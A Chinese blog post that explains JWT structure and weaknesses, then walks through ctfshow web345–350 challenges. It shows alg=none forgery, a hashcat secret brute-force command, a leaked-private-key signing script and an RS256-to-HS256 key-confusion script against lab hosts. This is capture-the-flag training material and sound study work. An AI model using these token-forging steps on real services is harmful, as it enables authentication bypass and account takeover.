jwt复习及ctfshow做题

于 2024-07-16 10:54:46 发布
阅读量454 收藏 10
点赞数 22
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140460380
版权

Jwt复习总结

JWT简介

JWT即Json Web

Token的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。仅需要对该Token正确性进行校验即可,这就意味着基于token认证机制的应用,不需要去考虑用户在哪一台服务器登录了,为应用的扩展提供了便利。

新技术带来便利的同时也会带来新的安全问题,如果JWT本身安全存在问题,那么整个身份认证机制就会得不到保障。

JWT由三部分组成

类似于xxx.yyy.zzz,前两部分是base64编码的内容,第三部分是加密的签名部分

JWT实际上是一个字符串,由三部分构成:Header、Paylaod、Signature,各部分之间分别用Base64编码以后用.进行拼接。

Header部分主要承载两部分的信息:声明类型(JWT类型);声明加密算法,一般是RS256(非对称加密)和HS256(对称加密);

Payload部分主要包含服务器所需的信息,如

iss (issuer):签发人

exp (expiration time):过期时间

sub (subject):主题

aud (audience):受众

nbf (Not Before):生效时间

iat (Issued At):签发时间

jti (JWT ID):编号

Signature部分是一个签名信息,需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密。base64UrlEncode就是base64编码。

// javascript

var encodedString = base64UrlEncode(header) + '.' + base64UrlEncode(payload);

var signature = HMACSHA256(encodedString, 'secret');

漏洞存在

Header

是否可以删除签名

是否支持修改算法为none/对称加密算法

插入错误信息

jwk元素是否可信

kid字段是否有SQL注入/命令注入/目录遍历

是否强制使用白名单上的加密算法

Signature

签名密钥是否可以爆破

检查是否强制检查

是否可以通过其他方式拿到密钥

自身存在脆弱性的算法

签名方法之间是否存在冲突

两种思路

  1. 爆破密钥,显然难度较大;2、尝试将加密算法置空,也就是 alg=none

Web345

Bp抓包

发现了eyj开头为jwt标志位

JSON Web Tokens - jwt.io

解码修改user为admin

再用base64加密

Web346

非法篡改

{

  "alg": "HS256",

  "typ": "JWT"

}

改为

{

  "alg": "None",

  "typ": "JWT"

}

改为

{

  "iss": "admin",

  "iat": 1721091476,

  "exp": 1721098676,

  "nbf": 1721091476,

  "sub": "admin",

  "jti": "4e5a0479b94b3aaaa85e807c565658f8"

}

再将两个代码用base64加密用(.)点连接起来末尾再加一个点

Web347

 hashcat -a 0 -m 16500 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcyMTA5NDg3MSwiZXhwIjoxNzIxMTAyMDcxLCJuYmYiOjE3MjEwOTQ4NzEsInN1YiI6InVzZXIiLCJqdGkiOiJhOGExYWI5NTgzODFmYzQ1ZWZhNzVlNTc1NjE0NTRiYyJ9.JZbvfratJGlHCQ3ZWe83-03n3kQC-TK3W9UW-kk9vc8

  ../jwt.secrets.list

爆破出密钥:123456

Web348

GitHub - brendan-rius/c-jwt-cracker: JWT brute force cracker written in C

下载爆破工具

爆破除密钥为:aaab

拿到flag

Web349(私钥泄露)

看到js

/* GET home page. */

router.get('/', function(req, res, next) {

  res.type('html');

  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');

  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });

  res.cookie('auth',token);

  res.end('where is flag?');

  

});

router.post('/',function(req,res,next){

var flag="flag_here";

res.type('html');

var auth = req.cookies.auth;

var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public key

jwt.verify(auth, cert, function(err, decoded) {

  if(decoded.user==='admin'){

   res.end(flag);

  }else{

   res.end('you are not admin');

  }

});

});

https://bb6808fe-2ad4-4c01-b9c0-e68c20ed0e2f.challenge.ctf.show/private.key

获取私钥

pip install PyJWT

pip install jwt

import jwt
public = open('D:\\桌面\\jwt总结\\private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))

获取cookie

GET部分

 当用户访问主页时,服务器读取当前工作目录下的public/private.key私钥文件,使用该私钥对用户信息(这里仅为user: 'user')进行加密签名生成JWT令牌,并将这个令牌作为名为auth的cookie设置在响应中。最后返回提示信息"where is flag?"。

POST:

当用户向主页发起POST请求时,服务器首先获取客户端发送过来的请求头中的auth cookie值,然后读取public/public.key公钥文件用于解密验证JWT令牌。如果解密后得到的用户信息为admin,则返回隐藏的flag内容;否则返回提示信息"you are not admin",表示用户无权访问此标志。

Web350(公钥泄露)

在线网站:

NodeJSProject (teamcode.com)

安装环境:

npm install jsonwebtoken

上传文件

https://d2a0b9be-27f7-4c4e-86b8-c17c5e6c913c.challenge.ctf.show/public.key

编写脚本:

var jwt = require('jsonwebtoken');

var fs = require('fs');

var privateKey = fs.readFileSync('./public.key');

var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });

console.log(token)

POST提交数据包

小春学渗透
关注
  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JWT学习(ctfshow web入门jwt
qq_45766062的博客
11-20 1256
jwt介绍 ctfshow web入门jwt web345 工具:burp suite,jwt在线解码工具链接 分析:首先看到提示/admin 访问抓包,看到auth,实际上就是jwt: 然后,用在线工具解码:
ctfshow——JWT
qq_55202378的博客
05-01 916
抓个包,可以看到cookie部分使用JWT(Json Web Token)。 先用base64将JWT进行解密,修改为admin,再用base64进行加密。再访问 这里使用了HS256加密方式,方法:alg字段改为,sub改为,对每一段分别用base64进行加密,然后用拼接起来,注意最后一个点不能少。都可以用jwt-cracker进行爆破,获取密匙。或者用脚本跑。 web 349——非对称加密算法RS256私钥泄漏 根据提示,大致意思就是访问,服务器会使用RS256算法私钥加密一段字符串作为cookie
CTFshow JWT
starttv的博客
11-24 398
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,该规范允许我们通过JWT在用户和服务器之间安全可靠地传递信息。
ctfshow JWT 专题
会下雪的晴天
01-02 521
title: ctfshow JWT 专题 date: 2020-12-29 15:31:47 categories: ctfshow csdn随缘更新了 JWT(json web token)跨域认证解决方案,入门教程 web345 web346 web347 web348 web345 没加密,直接伪造,推荐网站:https://jwt.io/ web346 有加密,不能爆破,改算法为none,sub为admin即可 web347 弱口令,盲猜:123456 web348 C语言爆破工具 .
ctfshow 347 jwt暴力破解密钥
c1516175954的博客
09-20 479
jwtool.py爆破,得到key:123456。
JWT Token生成及验证
07-16
JSON Web Token(JWT)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为JSON对象。这种信息可以被验证和信任,因为它是数字签名的。JWT在身份验证和授权场景中广泛应用...
JWT Token实现方法及步骤详解
09-07
JSON Web Token (JWT) 是一种安全的身份验证和信息传输机制,尤其在前后端分离的应用架构中广泛应用。JWT 用于在不同系统之间安全地传递信息,尤其是用户认证信息,且无需在每次请求时与服务器交互。它由三部分组成...
JWT Token生成及验证(源码)
04-12
这个"JWT Token生成及验证(源码)"的压缩包文件可能包含了一个示例项目,用于演示如何生成和验证JWT令牌。让我们深入探讨JWT的工作原理以及相关的关键知识点。 1. JWT结构: JWT令牌由三部分组成,用点(.)分隔:...
uniapp 截取两条数据 进行页面翻页滚动
abcdef_520的博客
07-15 115
uniapp 定时器滚动
java 中钻石操作符 <> 的使用场景
qq_27390023的博客
07-10 476
钻石操作符在 Java 中的主要作用是简化泛型类型的实例化,减少代码冗余,使代码更加简洁和可读。它通过类型推断机制,让编译器自动推断出类型参数,而不需要程序员显式地重复类型参数。这样不仅减少了代码量,还减少了出错的可能性。
java集合工具类
药的博客
07-12 431
【代码】java集合工具类。
QMimeData
最新发布
weixin_46430763的博客
07-15 143
QMimeData类用于在不同组件(如剪贴板、拖放操作等)之间传输数据,是一种数据容器,可以存储各种数据格式的信息。xtensions) 是描述消息内容类型的因特网标准。
简单记录一下在java的Mybatis-plus中用一个SQL语句查询一个嵌套的实体类(实体类中有List,List中还有List)
xiaoyezhiei的博客
07-15 268
也就是KpCourseInfoClientDetailVO课程详情类中含有List courseChapterList章节列表,然后章节列表中含有List lessonList课时列表,通过一个SQL查询得到结果。因为是在实体类中List嵌套List,所以外部的List直接用collection 标签来写,然后再给其内部嵌套的List标签写个resultMap 来对应参数,最后通过接口调用就能拿到想要的参数结构了。然后在KpCourseInfoMapper.xml中实现。得到下列结果,说明SQL没有问题。
探索Conda世界:使用conda list命令的全面指南
2401_85702623的博客
07-09 733
命令是Conda中一个非常有用的工具,它允许用户列出当前环境中安装的所有包,并提供了多种选项来定制输出。命令是Conda工具集中的一个关键命令,它允许用户列出当前环境中安装的所有包及其版本。Conda是一个流行的包管理器和环境管理器,广泛用于Python和其他科学计算语言的依赖管理。命令的方法,希望能帮助您更有效地管理Conda环境和依赖。命令的不断探索,您将发现更多提高开发效率和项目质量的方法。命令,包括命令的使用方式、选项和实际应用。命令可以列出当前环境中所有已安装的包。命令来管理您的Conda环境。
MyBatis-Plus 关联查询
qq_38410795冰淇淋的博客
07-12 298
【代码】MyBatis-Plus 关联查询。
springboot集成MQTT实现消息接收
qq_38041439的博客
07-15 302
springboot集成Mqtt消息接收
力扣单链表例题分析
qq_63074244的博客
07-15 218
以上是所学的快慢指针,链表反转,这几种方法的掌握对我们后续知识的学习也是很有帮助的。后面我还会对快慢指针进行深一步的探索,期待大家的指正。
VB 实例:掌握 Visual Basic 编程的精髓
lly202406的博客
07-13 375
Visual Basic(简称VB)是一种由微软开发的高级编程语言,它结合了易于使用的界面和强大的编程功能,使得初学者和专业人士都能快速开发Windows桌面应用程序。本文将通过一系列实例,深入探讨VB编程的基础知识和高级技巧,帮助读者掌握这门语言的精髓。
IMemoryCache 使用
07-15 153
IMemoryCache 提供了一个内存中的缓存存储,允许你存储和检索对象,这些对象可以在应用程序的不同部分之间共享,以提高性能并减少重复计算或数据库访问的次数。
ctfshow JWT
09-08
CTFShow JWT是一个由头部、有效载荷和签名三部分组成的JSON Web Token。其中,头部包含了JWT的类型和使用的算法,有效载荷包含了一些信息,比如发行者、颁发时间、过期时间等,签名则用于验证JWT的完整性和真实性。 在CTFShow中,可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。例如,可以将头部的算法字段改为"none",将有效载荷中的用户字段改为"admin",以绕过网站的JWT算法限制。 为了生成这样的JWT,可以使用Python脚本来生成。脚本中使用了jwt库,通过指定合适的头部、有效载荷和算法来生成JWT。具体来说,可以将头部的算法字段设置为"none",将有效载荷中的用户字段设置为"admin"。生成的JWT可以用于攻击或验证绕过。 总结来说,CTFShow JWT是一个由头部、有效载荷和签名组成的JSON Web Token,在CTFShow中可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值